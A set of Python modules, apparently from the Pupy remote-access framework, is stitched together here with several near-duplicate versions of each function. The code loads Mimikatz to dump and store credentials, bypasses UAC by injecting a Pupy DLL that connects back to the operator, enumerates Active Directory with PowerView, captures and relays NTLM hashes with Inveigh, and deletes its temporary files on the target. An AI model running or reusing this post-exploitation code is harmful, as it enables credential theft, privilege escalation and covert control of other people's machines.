def run(self, args):
if self.client.is_windows():
content = open(
os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"),
'r').read()
function = 'Check-VM'
output = execute_powershell_script(self, content, function)
if output.strip():
self.success("%s" % output)
else:
self.success("No virtual machine detected")
elif self.client.is_linux():
self.client.load_package("checkvm")
vm = self.client.conn.modules["checkvm"].checkvm()
if vm:
self.success('This appears to be a %s virtual machine' % vm)
else:
self.success('This does not appear to be a virtual machine')
elif self.client.is_darwin():
self.client.load_package("checkvm")
self.info('Be patient, could take a while')
vm = self.client.conn.modules["checkvm"].checkvm()
if vm:
self.success('This appears to be a %s virtual machine' % vm)
else:
self.success('This does not appear to be a virtual machine')
def run(self, args):
# check if windows 8.1 or Win2012 => reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
script = 'mimikatz'
# check if file has been already uploaded to the target
for arch in ['x64', 'x86']:
if script not in self.client.powershell[arch]['scripts_loaded']:
content = open(
os.path.join(ROOT, "external", "PowerSploit",
"Exfiltration", "Invoke-Mimikatz.ps1"),
'r').read()
else:
content = ''
output = execute_powershell_script(self,
content,
args.command,
x64IfPossible=True,
script_name=script)
if not output:
self.error("Error running mimikatz. Enough privilege ?")
return
self.success("%s" % output)
creds = self.parse_mimikatz(output)
db = Credentials()
db.add(creds)
self.success("Credentials stored on the database")
def bypassuac_through_powerSploitBypassUAC(self):
'''
Performs an UAC bypass attack by using the powersloit UACBypass script (wind7 to 8.1)
'''
#Constants
self.module.info('Running powersloit UACBypass method for bypassing UAC...')
bypassUACcmd = "{InvokeBypassUAC} -Command 'powershell.exe -ExecutionPolicy Bypass -file {mainPowershell} -Verbose'".format(InvokeBypassUAC=self.bypassUAC_random_name, mainPowershell=self.mainPowershellScriptRemotePath)
self.module.info('Uploading temporary files')
self.uploadPowershellScripts()
self.uploadPupyDLL()
content = re.sub("Write-Verbose ","Write-Output ", open(self.invokeBypassUACLocalPath, 'r').read(), flags=re.I)
content = re.sub("Invoke-BypassUAC", self.bypassUAC_random_name, content, flags=re.I)
logging.debug("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd))
self.module.info('Starting the UAC Bypass process')
output = execute_powershell_script(self.module, content, bypassUACcmd, x64IfPossible=True)
logging.debug("BypassUAC script output: %s\n"%(output))
if "DLL injection complete!" in output:
self.module.success("UAC bypassed")
else:
self.module.warning("Impossible to know what's happened remotely. You should active debug mode.")
#Clean tmp files
tmp_files = [self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.invokeBypassUACRemotePath, self.pupyDLLRemotePath]
logging.debug("Deleting temporary files")
self.module.client.conn.modules["pupwinutils.bypassuac_remote"].deleteTHisRemoteFile(tmp_files)
#...
self.module.success("Waiting for a connection from the DLL (take few seconds)...")
self.module.success("If nothing happened, try to migrate to another process and try again.")
def bypassuac_through_PowerSploitBypassUAC(self):
'''
Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1)
'''
#Constants
bypassUACcmd = "{InvokeBypassUAC} -Command 'powershell.exe -ExecutionPolicy Bypass -file {mainPowershell} -Verbose'".format(InvokeBypassUAC=self.bypassUAC_random_name, mainPowershell=self.mainPowershellScriptRemotePath)
self.module.info('Uploading temporary files')
self.uploadPowershellScripts()
self.uploadPupyDLL()
content = re.sub("Write-Verbose ","Write-Output ", open(self.invokeBypassUACLocalPath, 'r').read(), flags=re.I)
content = re.sub("Invoke-BypassUAC", self.bypassUAC_random_name, content, flags=re.I)
logging.debug("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd))
self.module.info('Starting the UAC Bypass process')
output = execute_powershell_script(self.module, content, bypassUACcmd, x64IfPossible=True)
logging.debug("BypassUAC script output: %s\n"%(output))
if "DLL injection complete!" in output:
self.module.success("UAC bypassed")
else:
self.module.warning("Impossible to know what's happened remotely. You should active debug mode.")
#Clean tmp files
tmp_files = [self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.invokeBypassUACRemotePath, self.pupyDLLRemotePath]
logging.debug("Deleting temporary files")
self.module.client.conn.modules["pupwinutils.bypassuac_remote"].deleteTHisRemoteFile(tmp_files)
#...
self.module.success("Waiting for a connection from the DLL (take few seconds)...")
self.module.success("If nothing happened, try to migrate to another process and try again.")
def run(self, args):
content = open(
os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"),
'r').read()
function = 'Check-VM'
output = execute_powershell_script(self, content, function)
self.success("%s" % output)
def run(self, args):
# for windows 10, if the UseLogonCredential registry is not present or disable (equal to 0), not plaintext password can be retrieved using mimikatz.
if args.wdigest:
self.client.load_package("pupwinutils.wdigest")
ok, message = self.client.conn.modules["pupwinutils.wdigest"].wdigest(args.wdigest)
if ok:
self.success(message)
else:
self.warning(str(message))
return
script ='mimikatz'
# check if file has been already uploaded to the target
for arch in ['x64', 'x86']:
if script not in self.client.powershell[arch]['scripts_loaded']:
content = open(os.path.join(ROOT, "external", "PowerSploit", "Exfiltration", "Invoke-Mimikatz.ps1"), 'r').read()
else:
content = ''
output = execute_powershell_script(self, content, args.command, x64IfPossible=True, script_name=script)
if not output:
self.error("Error running mimikatz. Enough privilege ?")
return
self.success("%s" % output)
creds = self.parse_mimikatz(output)
db = Credentials()
db.add(creds)
self.success("Credentials stored on the database")
def bypassuac_through_PowerSploitBypassUAC(self):
'''
Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1)
'''
#Constants
bypassUACcmd = "Invoke-BypassUAC -Command 'powershell.exe -ExecutionPolicy Bypass -file {0} -Verbose'".format(
self.mainPowershellScriptRemotePath
) #{0}=mainPowerShellScriptPrivileged.ps1
byPassUACSuccessString = "DLL injection complete!"
self.uploadPowershellScripts()
self.uploadPupyDLL()
content = re.sub("Write-Verbose ",
"Write-Output ",
open(self.invokeBypassUACLocalPath, 'r').read(),
flags=re.I)
logging.info(
"Starting BypassUAC script with the following cmd: {0}".format(
bypassUACcmd))
output = execute_powershell_script(self.module, content, bypassUACcmd)
logging.info("BypassUAC script output: %s\n" % (output))
if byPassUACSuccessString in output:
self.module.success("UAC bypassed")
else:
self.module.warning(
"Impossible to know what's happened remotely. You should active debug mode."
)
#Clean
self.deleteTHisRemoteFile(self.invokeReflectivePEInjectionRemotePath)
self.deleteTHisRemoteFile(self.mainPowershellScriptRemotePath)
self.deleteTHisRemoteFile(self.invokeBypassUACRemotePath)
self.deleteTHisRemoteFile(self.pupyDLLRemotePath)
#...
self.module.success(
"Waiting for a connection from the DLL (take few seconds)...")
def run(self, args):
content = open(os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"), 'r').read()
function = 'Check-VM'
output = execute_powershell_script(self, content, function)
if output.strip():
self.success("%s" % output)
else:
self.success("No virtual machine detected")
def run(self, args):
content = open(os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"), "r").read()
function = "Check-VM"
output = execute_powershell_script(self, content, function)
if output.strip():
self.success("%s" % output)
else:
self.success("No virtual machine detected")
def run(self, args):
content = open(os.path.join(ROOT, "external", "PowerSploit", "Privesc", "PowerUp.ps1"), 'r').read()
# launch all PowerUp checks
function = 'Invoke-AllChecks'
output = execute_powershell_script(self, content, function)
# parse output depending on the PowerUp output
output = output.replace('\r\n\r\n\r\n', '\r\n\r\n').replace("\n\n", "\n").replace("\n\n", "\n")
self.success("Output of the script: \n%s" % output)
def run(self, args):
content = open(
os.path.join(ROOT, "external", "PowerSploit", "Privesc",
"PowerUp.ps1"), 'r').read()
# launch all PowerUp checks
function = 'Invoke-AllChecks'
output = execute_powershell_script(self, content, function)
# parse output depending on the PowerUp output
output = output.replace('\r\n\r\n\r\n', '\r\n\r\n').replace(
"\n\n", "\n").replace("\n\n", "\n")
self.success("%s" % output)
def run(self, args):
script = 'powerup'
# check if file has been already uploaded to the target
for arch in ['x64', 'x86']:
if script not in self.client.powershell[arch]['scripts_loaded']:
content = open(os.path.join(ROOT, "external", "PowerSploit", "Privesc", "PowerUp.ps1"), 'r').read()
else:
content = ''
output = execute_powershell_script(self, content, args.command, script_name=script)
# parse output depending on the PowerUp output
output = output.replace('\r\n\r\n\r\n', '\r\n\r\n').replace("\n\n", "\n").replace("\n\n", "\n")
self.success("%s" % output)
def run(self, args):
script = 'powerview'
# check if file has been already uploaded to the target
for arch in ['x64', 'x86']:
if script not in self.client.powershell[arch]['scripts_loaded']:
content = open(os.path.join(ROOT, "external", "PowerSploit", "Recon", "PowerView.ps1"), 'r').read()
else:
content = ''
output = execute_powershell_script(self, content, args.command, script_name=script)
if not output:
self.error("No results")
return
self.success("Output: \n%s\n" % output)
def run(self, args):
if self.client.is_windows():
content = open(os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"), 'r').read()
function = 'Check-VM'
output = execute_powershell_script(self, content, function)
if output.strip():
self.success("%s" % output)
else:
self.success("No virtual machine detected")
elif self.client.is_linux():
self.client.load_package("checkvm")
vm = self.client.conn.modules["checkvm"].checkvm()
if vm:
self.success('This appears to be a %s virtual machine' % vm)
else:
self.success('This does not appear to be a virtual machine')
def run(self, args):
# check if windows 8.1 or Win2012 => reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
content = open(os.path.join(ROOT, "external", "PowerSploit", "Exfiltration", "Invoke-Mimikatz.ps1"), 'r').read()
function = 'Invoke-Mimikatz'
output = execute_powershell_script(self, content, function, x64IfPossible=True)
if not output:
self.error("Error running mimikatz. Enough privilege ?")
return
self.success("%s" % output)
creds = self.parse_mimikatz(output)
db = Credentials()
db.add(creds)
self.success("Credentials stored on the database")
def run(self, args):
# for windows 10, if the UseLogonCredential registry is not present or disable (equal to 0), not plaintext password can be retrieved using mimikatz.
if args.wdigest:
self.client.load_package("pupwinutils.wdigest")
ok, message = self.client.conn.modules[
"pupwinutils.wdigest"].wdigest(args.wdigest)
if ok:
self.success(message)
else:
self.warning(str(message))
return
script = 'mimikatz'
# check if file has been already uploaded to the target
for arch in ['x64', 'x86']:
if script not in self.client.powershell[arch]['scripts_loaded']:
content = open(
os.path.join(ROOT, "external", "PowerSploit",
"Exfiltration", "Invoke-Mimikatz.ps1"),
'r').read()
else:
content = ''
output = execute_powershell_script(self,
content,
args.command,
x64IfPossible=True,
script_name=script)
if not output:
self.error("Error running mimikatz. Enough privilege ?")
return
self.success("%s" % output)
creds = self.parse_mimikatz(output)
db = Credentials()
db.add(creds)
self.success("Credentials stored on the database")
def bypassuac_through_PowerSploitBypassUAC(self):
'''
Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1)
'''
#Constants
bypassUACcmd = "Invoke-BypassUAC -Command 'powershell.exe -ExecutionPolicy Bypass -file {0} -Verbose'".format(self.mainPowershellScriptRemotePath) #{0}=mainPowerShellScriptPrivileged.ps1
byPassUACSuccessString = "DLL injection complete!"
self.uploadPowershellScripts()
self.uploadPupyDLL()
content = re.sub("Write-Verbose ","Write-Output ", open(self.invokeBypassUACLocalPath, 'r').read(), flags=re.I)
logging.info("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd))
output = execute_powershell_script(self.module, content, bypassUACcmd)
logging.info("BypassUAC script output: %s\n"%(output))
if byPassUACSuccessString in output:
self.module.success("UAC bypassed")
else:
self.module.warning("Impossible to know what's happened remotely. You should active debug mode.")
#Clean
self.deleteTHisRemoteFile(self.invokeReflectivePEInjectionRemotePath)
self.deleteTHisRemoteFile(self.mainPowershellScriptRemotePath)
self.deleteTHisRemoteFile(self.invokeBypassUACRemotePath)
self.deleteTHisRemoteFile(self.pupyDLLRemotePath)
#...
self.module.success("Waiting for a connection from the DLL (take few seconds)...")
def run(self, args):
content = open(os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"), 'r').read()
function = 'Check-VM'
output = execute_powershell_script(self, content, function)
self.success("%s" % output)
def bypassuac_through_trusted_publisher_certificate(module, rootPupyPath):
'''
Performs a bypass UAC attack by utilizing the trusted publisher certificate through process injection.
'''
module.client.load_package("psutil")
module.client.load_package("pupwinutils.processes")
#Define Remote paths
remoteTempFolder = module.client.conn.modules['os.path'].expandvars(
"%TEMP%")
invokeReflectivePEInjectionRemotePath = "{0}.{1}".format(
module.client.conn.modules['os.path'].join(
remoteTempFolder, next(_get_candidate_names())), '.txt')
invokeBypassUACRemotePath = "{0}.{1}".format(
module.client.conn.modules['os.path'].join(
remoteTempFolder, next(_get_candidate_names())), '.ps1')
mainPowershellScriptRemotePath = "{0}.{1}".format(
module.client.conn.modules['os.path'].join(
remoteTempFolder, next(_get_candidate_names())), '.ps1')
pupyDLLRemotePath = "{0}.{1}".format(
module.client.conn.modules['os.path'].join(
remoteTempFolder, next(_get_candidate_names())), '.txt')
#Define Local paths
mainPowerShellScriptPrivilegedLocalPath = os.path.join(
gettempdir(), 'mainPowerShellScriptPrivileged.txt')
invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external",
"Empire", "privesc",
"Invoke-BypassUAC.ps1")
invokeReflectivePEInjectionLocalPath = os.path.join(
rootPupyPath, "pupy", "external", "PowerSploit", "CodeExecution",
"Invoke-ReflectivePEInjection.ps1")
invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external",
"Empire", "privesc",
"Invoke-BypassUAC.ps1")
pupyDLLLocalPath = os.path.join(gettempdir(), 'dllFile.txt')
#Constants
bypassUACcmd = "Invoke-BypassUAC -Command 'powershell.exe -ExecutionPolicy Bypass -file {0} -Verbose'".format(
mainPowershellScriptRemotePath
) #{0}=mainPowerShellScriptPrivileged.ps1
byPassUACSuccessString = "DLL injection complete!"
#main powershell script executed by bypassuac powershell script
mainPowerShellScriptPrivileged = """
cat {0} | Out-String | iex
cat {1} | Out-String | iex
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ForceASLR
""" #{0}=Invoke-ReflectivePEInjection.txt and {1}=dllFile.txt
logging.info("Creating the Powershell script in %s locally" %
(mainPowerShellScriptPrivilegedLocalPath))
with open(mainPowerShellScriptPrivilegedLocalPath, 'w+') as w:
w.write(
mainPowerShellScriptPrivileged.format(
invokeReflectivePEInjectionRemotePath, pupyDLLRemotePath))
logging.info("Uploading powershell code for DLL injection in {0}".format(
invokeReflectivePEInjectionRemotePath))
upload(module.client.conn, invokeReflectivePEInjectionLocalPath,
invokeReflectivePEInjectionRemotePath)
#logging.info("Uploading powershell code for UAC Bypass in {0}".format())
#upload(module.client.conn, invokeBypassUACLocalPath, invokeBypassUACRemotePath)
logging.info(
"Uploading main powershell script executed by BypassUAC in {0}".format(
mainPowerShellScriptPrivilegedLocalPath))
upload(module.client.conn, mainPowerShellScriptPrivilegedLocalPath,
mainPowershellScriptRemotePath)
res = module.client.conn.modules['pupy'].get_connect_back_host()
host, port = res.rsplit(':', 1)
logging.info("Address configured is %s:%s for pupy dll..." % (host, port))
logging.info("Looking for process architecture...")
if module.client.conn.modules['pupwinutils.processes'].is_x64_architecture(
) == True:
logging.info("Target achitecture is x64, using a x64 dll")
dllbuff = pupygen.get_edit_pupyx64_dll(module.client.get_conf())
elif module.client.conn.modules[
'pupwinutils.processes'].is_x86_architecture() == True:
logging.info("Target achitecture is x86, using a x86 dll")
dllbuff = pupygen.get_edit_pupyx86_dll(module.client.get_conf())
else:
module.error(
"Target architecture is unknown (!= x86 or x64), abording...")
return
logging.info("Creating the pupy dll in %s locally" % (pupyDLLLocalPath))
with open(pupyDLLLocalPath, 'w+') as w:
w.write('$PEBytes = [System.Convert]::FromBase64String("%s")' %
(base64.b64encode(dllbuff)))
logging.info("Uploading pupy dll in {0}".format(pupyDLLRemotePath))
upload(module.client.conn, pupyDLLLocalPath, pupyDLLRemotePath)
content = re.sub("Write-Verbose ",
"Write-Output ",
open(invokeBypassUACLocalPath, 'r').read(),
flags=re.I)
logging.info(
"Starting BypassUAC script with the following cmd: {0}".format(
bypassUACcmd))
output = execute_powershell_script(module, content, bypassUACcmd)
logging.info("BypassUAC script output: %s\n" % (output))
if byPassUACSuccessString in output:
module.success("UAC bypassed")
else:
module.warning(
"Impossible to know what's happened remotely. You should active debug mode."
)
for aFile in [
invokeReflectivePEInjectionRemotePath, invokeBypassUACRemotePath,
mainPowershellScriptRemotePath, pupyDLLRemotePath
]:
logging.info("Deleting remote file {0}".format(aFile))
output = module.client.conn.modules.subprocess.check_output(
"DEL /F /Q \"{0}\"".format(aFile),
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE,
shell=True)
logging.debug("Delete Status: {0}".format(repr(output)))
module.success(
"Waiting for a connection from the DLL (take few seconds)...")
def run(self, args):
script = 'powerview'
command = ""
if args.list_available_commands:
self.log(self.commands_available)
return
# check if file has been already uploaded to the target
for arch in ['x64', 'x86']:
if script not in self.client.powershell[arch]['scripts_loaded']:
logging.debug("Loading PowerView.ps1 script on target...")
content = open(os.path.join(ROOT, "external", "PowerSploit", "Recon", "PowerView.ps1"), 'r').read()
else:
logging.debug("PowerView.ps1 script already loaded on target")
content = ''
if args.GetProxy == True:
command = "Get-Proxy"
if args.GetNetComputer == True:
command = "Get-NetComputer"
elif args.GetNetMssql == True:
command = "Get-NetComputer -SPN mssql*"
elif args.GetNetSubnet == True:
command = "Get-NetSubnet"
elif args.GetNetGroup == True:
command = "Get-NetGroup"
elif args.GetNetGroupWith !=None:
command = "Get-NetGroup -GroupName *{0}* -FullData".format(args.GetNetGroupWith)
elif args.GetNetGroupMember == True:
command = "Get-NetGroupMember"
elif args.GetNetFileServer == True:
command = "Get-NetFileServer"
elif args.GetDFSshare == True:
command = "Get-DFSshare"
elif args.GetNetGPO == True:
command = "Get-NetGPO"
elif args.GetNetGPOGroup == True:
command = "Get-NetGPOGroup"
elif args.FindGPOLocation !=None:
command = "Find-GPOLocation -UserName {0}".format(args.FindGPOLocation)
elif args.GetNetLocalGroup == True:
command = "Get-NetLocalGroup"
elif args.GetNetLoggedon == True:
command = "Get-NetLoggedon"
elif args.GetNetLoggedonOn !=None:
command = "Get-NetLoggedon -ComputerName {0}".format(args.GetNetLoggedonOn)
elif args.GetNetSession == True:
command = "Get-NetSession"
elif args.GetNetSessionOn !=None:
command = "Get-NetSession -ComputerName {0}".format(args.GetNetSessionOn)
elif args.GetNetRDPSession == True:
command = "Get-NetRDPSession"
elif args.GetNetRDPSessionOn !=None:
command = "Get-NetRDPSession -ComputerName {0}".format(args.GetNetRDPSessionOn)
elif args.GetLastLoggedOn == True:
command = "Get-LastLoggedOn"
elif args.GetLastLoggedOnOn !=None:
command = "Get-LastLoggedOn -ComputerName {0}".format(args.GetLastLoggedOnOn)
elif args.InvokeUserHunterCheck == True:
command = "Invoke-UserHunter -CheckAccess"
elif args.InvokeUserHunterForest == True:
command = "Invoke-UserHunter -SearchForest"
elif args.GetExploitableSystem == True:
command = "Get-ExploitableSystem | Format-Table -AutoSize"
if command == "":
if args.command == None:
self.error("You have to choose a powerview command!")
return
else:
command = args.command
logging.debug("Executing the following powerview command: {0}".format(command))
output = execute_powershell_script(self, content, command, script_name=script)
if not output:
self.error("No results")
return
self.success("Output: \n%s\n" % output)
def run(self, args):
script = 'inveigh'
pathToScript, command, remote_temp_folder = "", "", ""
if args.tmpOutFolder == self.DEFAULT_REMOTE_FOLDER:
remote_temp_folder = self.client.conn.modules[
'os.path'].expandvars("%TEMP%")
else:
remote_temp_folder = args.tmpOutFolder
logging.debug(
'{0} used for saving real time results on the target'.format(
remote_temp_folder))
commonOptions = " -Tool 1 -FileOutput Y -OutputDir {0} ".format(
remote_temp_folder)
logging.debug(
"These folowing Inveigh parameters will be given by default: {0}".
format(commonOptions))
self.path_log_out_file = ntpath.join(remote_temp_folder,
self.LOG_OUT_FILE)
self.path_ntlmv1_out_file = ntpath.join(remote_temp_folder,
self.NTLMV1_OUT_FILE)
self.path_ntlmv2_out_file = ntpath.join(remote_temp_folder,
self.NTLMV2_OUT_FILE)
self.path_cleartext_out_file = ntpath.join(remote_temp_folder,
self.CLEARTEXT_OUT_FILE)
localFolder = self.generateAndCreateLocalFolder(args.localOutputFolder)
if args.InvokeInveigh == False and args.InvokeInveighUnprivileged == False and args.InvokeInveighRelay == False and args.StopInveigh == False and args.getResults == False:
self.error("You have to give a command")
return
if args.getResults == True:
nb = self.downloadInveighFiles(remote_temp_folder, localFolder)
if nb == 0:
self.error(
"No one Inveigh result file downloaded. Is Inveigh is running on the target?"
)
else:
self.success("All Inveigh results downloaded")
return
elif args.InvokeInveigh == True:
self.success("Invoke-Inveigh command selected")
pathToScript = os.path.join(ROOT, "external", "Inveigh",
"Inveigh.ps1")
command = "Invoke-Inveigh" + commonOptions + args.inveighParams
elif args.InvokeInveighUnprivileged == True:
self.success("Invoke-InveighUnprivileged command selected")
pathToScript = os.path.join(ROOT, "external", "Inveigh",
"Inveigh-Unprivileged.ps1")
command = "Invoke-InveighUnprivileged" + commonOptions + args.inveighParams
elif args.InvokeInveighRelay == True:
self.success("Invoke-Relay command selected")
pathToScript = os.path.join(ROOT, "external", "Inveigh",
"Inveigh-Relay.ps1")
command = "Invoke-Relay" + commonOptions + args.inveighParams
elif args.StopInveigh == True:
pathToScript = os.path.join(ROOT, "external", "Inveigh",
"Inveigh.ps1")
command = "Stop-Inveigh"
logging.debug(
"The following script will be loaded on the target if needed: {0}".
format(pathToScript))
for arch in ['x64', 'x86']:
logging.debug("Powershell script actually loaded: {0}".format(
self.client.powershell[arch]['scripts_loaded']))
if script not in self.client.powershell[arch]['scripts_loaded']:
logging.debug(
"Loading {0} script on target...".format(pathToScript))
content = open(pathToScript, 'r').read()
else:
logging.debug(
"{0} script already loaded on target".format(pathToScript))
content = ''
logging.debug(
"Executing the following inveigh command: {0}".format(command))
output = execute_powershell_script(self,
content,
command,
x64IfPossible=True,
script_name=script)
if not output:
self.error("No results")
return
self.success("Output: \n%s\n" % output)
if args.StopInveigh == True and "exited at " in str(output):
self.success("Inveigh is stopped")
self.downloadInveighFiles(remote_temp_folder, localFolder)
self.removeRemoteInveighFiles()
def run(self, args):
script = 'inveigh'
pathToScript, command, remote_temp_folder = "", "", ""
if args.tmpOutFolder == self.DEFAULT_REMOTE_FOLDER:
remote_temp_folder = self.client.conn.modules['os.path'].expandvars("%TEMP%")
else:
remote_temp_folder = args.tmpOutFolder
logging.debug('{0} used for saving real time results on the target'.format(remote_temp_folder))
commonOptions = " -Tool 1 -FileOutput Y -OutputDir {0} ".format(remote_temp_folder)
logging.debug("These folowing Inveigh parameters will be given by default: {0}".format(commonOptions))
self.path_log_out_file = ntpath.join(remote_temp_folder, self.LOG_OUT_FILE)
self.path_ntlmv1_out_file = ntpath.join(remote_temp_folder, self.NTLMV1_OUT_FILE)
self.path_ntlmv2_out_file = ntpath.join(remote_temp_folder, self.NTLMV2_OUT_FILE)
self.path_cleartext_out_file = ntpath.join(remote_temp_folder, self.CLEARTEXT_OUT_FILE)
localFolder = self.generateAndCreateLocalFolder(args.localOutputFolder)
if args.InvokeInveigh == False and args.InvokeInveighUnprivileged == False and args.InvokeInveighRelay == False and args.StopInveigh == False and args.getResults == False:
self.error("You have to give a command")
return
if args.getResults == True:
nb = self.downloadInveighFiles(remote_temp_folder, localFolder)
if nb == 0:
self.error("No one Inveigh result file downloaded. Is Inveigh is running on the target?")
else:
self.success("All Inveigh results downloaded")
return
elif args.InvokeInveigh == True:
self.success("Invoke-Inveigh command selected")
pathToScript = os.path.join(ROOT, "external", "Inveigh", "Inveigh.ps1")
command = "Invoke-Inveigh"+commonOptions+args.inveighParams
elif args.InvokeInveighUnprivileged == True:
self.success("Invoke-InveighUnprivileged command selected")
pathToScript = os.path.join(ROOT, "external", "Inveigh", "Inveigh-Unprivileged.ps1")
command = "Invoke-InveighUnprivileged"+commonOptions+args.inveighParams
elif args.InvokeInveighRelay == True:
self.success("Invoke-Relay command selected")
pathToScript = os.path.join(ROOT, "external", "Inveigh", "Inveigh-Relay.ps1")
command = "Invoke-Relay"+commonOptions+args.inveighParams
elif args.StopInveigh == True:
pathToScript = os.path.join(ROOT, "external", "Inveigh", "Inveigh.ps1")
command = "Stop-Inveigh"
logging.debug("The following script will be loaded on the target if needed: {0}".format(pathToScript))
for arch in ['x64', 'x86']:
logging.debug("Powershell script actually loaded: {0}".format(self.client.powershell[arch]['scripts_loaded']))
if script not in self.client.powershell[arch]['scripts_loaded']:
logging.debug("Loading {0} script on target...".format(pathToScript))
content = open(pathToScript, 'r').read()
else:
logging.debug("{0} script already loaded on target".format(pathToScript))
content = ''
logging.debug("Executing the following inveigh command: {0}".format(command))
output = execute_powershell_script(self, content, command, x64IfPossible=True, script_name=script)
if not output:
self.error("No results")
return
self.success("Output: \n%s\n" % output)
if args.StopInveigh == True and "exited at " in str(output):
self.success("Inveigh is stopped")
self.downloadInveighFiles(remote_temp_folder, localFolder)
self.removeRemoteInveighFiles()
def run(self, args):
script = 'powerview'
command = ""
if args.list_available_commands:
self.log(self.commands_available)
return
# check if file has been already uploaded to the target
for arch in ['x64', 'x86']:
if script not in self.client.powershell[arch]['scripts_loaded']:
logging.debug("Loading PowerView.ps1 script on target...")
content = open(
os.path.join(ROOT, "external", "PowerSploit", "Recon",
"PowerView.ps1"), 'r').read()
else:
logging.debug("PowerView.ps1 script already loaded on target")
content = ''
if args.GetProxy == True:
command = "Get-Proxy"
if args.GetNetComputer == True:
command = "Get-NetComputer"
elif args.GetNetMssql == True:
command = "Get-NetComputer -SPN mssql*"
elif args.GetNetSubnet == True:
command = "Get-NetSubnet"
elif args.GetNetGroup == True:
command = "Get-NetGroup"
elif args.GetNetGroupWith != None:
command = "Get-NetGroup -GroupName *{0}* -FullData".format(
args.GetNetGroupWith)
elif args.GetNetGroupMember == True:
command = "Get-NetGroupMember"
elif args.GetNetFileServer == True:
command = "Get-NetFileServer"
elif args.GetDFSshare == True:
command = "Get-DFSshare"
elif args.GetNetGPO == True:
command = "Get-NetGPO"
elif args.GetNetGPOGroup == True:
command = "Get-NetGPOGroup"
elif args.FindGPOLocation != None:
command = "Find-GPOLocation -UserName {0}".format(
args.FindGPOLocation)
elif args.GetNetLocalGroup == True:
command = "Get-NetLocalGroup"
elif args.GetNetLoggedon == True:
command = "Get-NetLoggedon"
elif args.GetNetLoggedonOn != None:
command = "Get-NetLoggedon -ComputerName {0}".format(
args.GetNetLoggedonOn)
elif args.GetNetSession == True:
command = "Get-NetSession"
elif args.GetNetSessionOn != None:
command = "Get-NetSession -ComputerName {0}".format(
args.GetNetSessionOn)
elif args.GetNetRDPSession == True:
command = "Get-NetRDPSession"
elif args.GetNetRDPSessionOn != None:
command = "Get-NetRDPSession -ComputerName {0}".format(
args.GetNetRDPSessionOn)
elif args.GetLastLoggedOn == True:
command = "Get-LastLoggedOn"
elif args.GetLastLoggedOnOn != None:
command = "Get-LastLoggedOn -ComputerName {0}".format(
args.GetLastLoggedOnOn)
elif args.InvokeUserHunterCheck == True:
command = "Invoke-UserHunter -CheckAccess"
elif args.InvokeUserHunterForest == True:
command = "Invoke-UserHunter -SearchForest"
elif args.GetExploitableSystem == True:
command = "Get-ExploitableSystem | Format-Table -AutoSize"
if command == "":
if args.command == None:
self.error("You have to choose a powerview command!")
return
else:
command = args.command
logging.debug(
"Executing the following powerview command: {0}".format(command))
output = execute_powershell_script(self,
content,
command,
script_name=script)
if not output:
self.error("No results")
return
self.success("Output: \n%s\n" % output)
